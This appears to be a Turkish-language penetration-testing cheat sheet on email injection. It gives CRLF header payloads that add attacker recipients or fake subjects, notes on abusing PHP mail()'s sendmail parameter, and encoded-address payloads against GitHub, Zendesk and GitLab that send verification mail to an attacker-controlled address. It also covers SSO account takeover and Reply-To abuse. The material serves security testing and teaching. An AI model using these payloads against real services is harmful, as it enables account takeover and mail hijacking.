Email Injections

Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın. Bugün Erişim Alın:

Gönderilen e-postaya Enjekte Et

Gönderen argümanından sonra Cc ve Bcc enjekte et

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Mesaj, alıcı ve alıcı1 hesaplarına gönderilecektir.

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

Mesaj, orijinal alıcıya ve saldırgan hesabına gönderilecektir.

Konu argümanını Enjekte Et

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Sahte konu, orijinal konuya eklenecek ve bazı durumlarda onu değiştirecektir. Bu, mail hizmetinin davranışına bağlıdır.

Mesajın gövdesini değiştir

İki satır besleme enjekte et, ardından mesajın gövdesini değiştirmek için mesajını yaz.

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

PHP mail() fonksiyonu istismarı

# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

5. parametre ($additional_parameters)

Bu bölüm, bir saldırganın bu parametreyi kontrol ettiğini varsayarak nasıl kötüye kullanılacağını ele alacak.

Bu parametre, PHP'nin ikili sendmail'i çağırmak için kullanacağı komut satırına eklenecek. Ancak, escapeshellcmd($additional_parameters) fonksiyonu ile temizlenecek.

Bir saldırgan, bu durumda sendmail için ek parametreler enjekte edebilir.

/usr/sbin/sendmail uygulamasındaki farklılıklar

sendmail arayüzü, sistemde kurulu olan MTA e-posta yazılımı (Sendmail, Postfix, Exim vb.) tarafından sağlanmaktadır. Temel işlevsellik (örneğin -t -i -f parametreleri) uyumluluk nedenleriyle aynı kalırken, diğer işlevler ve parametreler kurulu MTA'ya bağlı olarak büyük ölçüde değişiklik göstermektedir.

İşte sendmail komutu/arayüzünün farklı man sayfalarına birkaç örnek:

• Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html

• Postfix MTA: http://www.postfix.org/mailq.1.html

• Exim MTA: https://linux.die.net/man/8/eximReferences

sendmail ikilisinin kökenine bağlı olarak, bunları kötüye kullanmak ve dosyaları sızdırmak veya hatta rastgele komutlar çalıştırmak için farklı seçenekler keşfedilmiştir. Nasıl olduğunu kontrol edin https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

E-posta adında enjekte et

Bir e-postanın göz ardı edilen kısımları

+, - ve {} sembolleri nadir durumlarda etiketleme için kullanılabilir ve çoğu e-posta sunucusu tarafından göz ardı edilebilir.

• Ör. john.doe+intigriti@example.com → john.doe@example.com

Parantez içindeki yorumlar () başlangıçta veya sonunda da göz ardı edilecektir.

• Ör. john.doe(intigriti)@example.com → john.doe@example.com

Beyaz listeyi atlama

Alıntılar

IP'ler

Ayrıca, köşeli parantezler arasında alan adı olarak IP'ler de kullanabilirsiniz:

• john.doe@[127.0.0.1]

• john.doe@[IPv6:2001:db8::1]

E-posta Kodlaması

bu araştırmada açıklandığı gibi, e-posta adları da kodlanmış karakterler içerebilir:

• PHP 256 taşması: PHP chr fonksiyonu, bir karaktere 256 eklemeye devam eder, pozitif hale gelene kadar ve ardından %256 işlemini yapar.

• String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @

Farklı kodlamalar:

# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com

# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding

# Other encodings, same example:
# iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
#punycode
x@xn--svg/-9x6 → x@<svg/

Payloads:

• Github: =?x?q?collab=40psres.net=3e=00?=foo@example.com

• Kodlanmış @ işaretinin =40, kodlanmış > işaretinin =3e ve null'ın =00 olarak belirtildiğine dikkat edin.

• Doğrulama e-postası collab@psres.net adresine gönderilecektir.

• Zendesk: "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com

• Önceki numara ile aynı ama başına bazı normal alıntılar ekleyerek ve kodlanmış alıntı =22 ekleyerek kodlanmış @ işaretinden önce ve ardından bir sonraki e-posta için bazı alıntıları açıp kapatarak Zendesk'in dahili olarak kullandığı sözdizimini düzeltmek.

• Doğrulama e-postası collab@psres.net adresine gönderilecektir.

• Gitlab: =?x?q?collab=40psres.net_?=foo@example.com

• Adresi ayırmak için alt çizgi kullanımına dikkat edin.

• Doğrulama e-postası collab@psres.net adresine gönderilecektir.

• Punycode: Punycode kullanarak Joomla'da <style etiketi enjekte etmek ve bunu CSS dışa aktarımı yoluyla CSRF token'ını çalmak için kötüye kullanmak mümkündü.

Tooling

• Bu tür kombinasyonları denemek için e-posta formatlarına saldırmak amacıyla Burp Suite Turbo Intruder script'i bulunmaktadır. Script, potansiyel olarak çalışan kombinasyonlara sahiptir.

• Ayrıca Hackvertor kullanarak bir e-posta bölme saldırısı oluşturmak da mümkündür.

Other vulns

Üçüncü taraf SSO

XSS

github veya salesforce gibi bazı hizmetler, üzerinde XSS yükleri bulunan bir e-posta adresi oluşturmanıza izin verir. Eğer bu sağlayıcıları diğer hizmetlere giriş yapmak için kullanabiliyorsanız ve bu hizmetler e-postayı doğru bir şekilde temizlemiyorsa, XSS oluşturabilirsiniz.

Hesap Ele Geçirme

Eğer bir SSO hizmeti, verilen e-posta adresini doğrulamadan bir hesap oluşturmanıza izin veriyorsa (örneğin salesforce) ve ardından bu hesabı farklı bir hizmette kullanabiliyorsanız ve bu hizmet salesforce'a güveniyorsa, herhangi bir hesaba erişebilirsiniz. &#xNAN;Note that salesforce, verilen e-postanın doğrulanıp doğrulanmadığını belirtir, ancak uygulama bu bilgiyi dikkate almalıdır.

Yanıtla

From: company.com kullanarak bir e-posta gönderebilir ve Replay-To: attacker.com kullanabilirsiniz ve eğer herhangi bir otomatik yanıt e-posta için iç adresinden gönderildiyse, saldırgan bu yanıtı alabilir.

Hard Bounce Oranı

AWS gibi belirli hizmetler, genellikle %10 olarak ayarlanan Hard Bounce Oranı olarak bilinen bir eşik uygular. Bu, özellikle e-posta teslimat hizmetleri için kritik bir metriktir. Bu oran aşıldığında, AWS'nin e-posta hizmeti gibi hizmetler askıya alınabilir veya engellenebilir.

Bir hard bounce, alıcının adresinin geçersiz veya mevcut olmadığı için gönderenine geri dönen bir e-posta anlamına gelir. Bu, e-postanın mevcut olmayan bir adrese, gerçek olmayan bir alan adına gönderilmesi veya alıcı sunucusunun e-postaları kabul etmeyi reddetmesi gibi çeşitli nedenlerden kaynaklanabilir.

AWS bağlamında, 1000 e-posta gönderdiğinizde ve bunlardan 100'ü hard bounce ile sonuçlandığında (geçersiz adresler veya alanlar gibi nedenlerden dolayı), bu %10 hard bounce oranı anlamına gelir. Bu orana ulaşmak veya aşmak, AWS SES (Simple Email Service) tarafından e-posta gönderme yeteneklerinizi engelleyebilir veya askıya alabilir.

Kesintisiz e-posta hizmeti sağlamak ve gönderen itibarını korumak için düşük bir hard bounce oranını sürdürmek kritik öneme sahiptir. E-posta listelerinizdeki e-posta adreslerinin kalitesini izlemek ve yönetmek, bunu başarmada önemli ölçüde yardımcı olabilir.

Daha ayrıntılı bilgi için, AWS'nin geri dönüşler ve şikayetlerle ilgili resmi belgelerine AWS SES Bounce Handling başvurabilirsiniz.

Referanslar

• https://resources.infosecinstitute.com/email-injection/

• https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

• https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view

• https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın. Bugün Erişim Alın: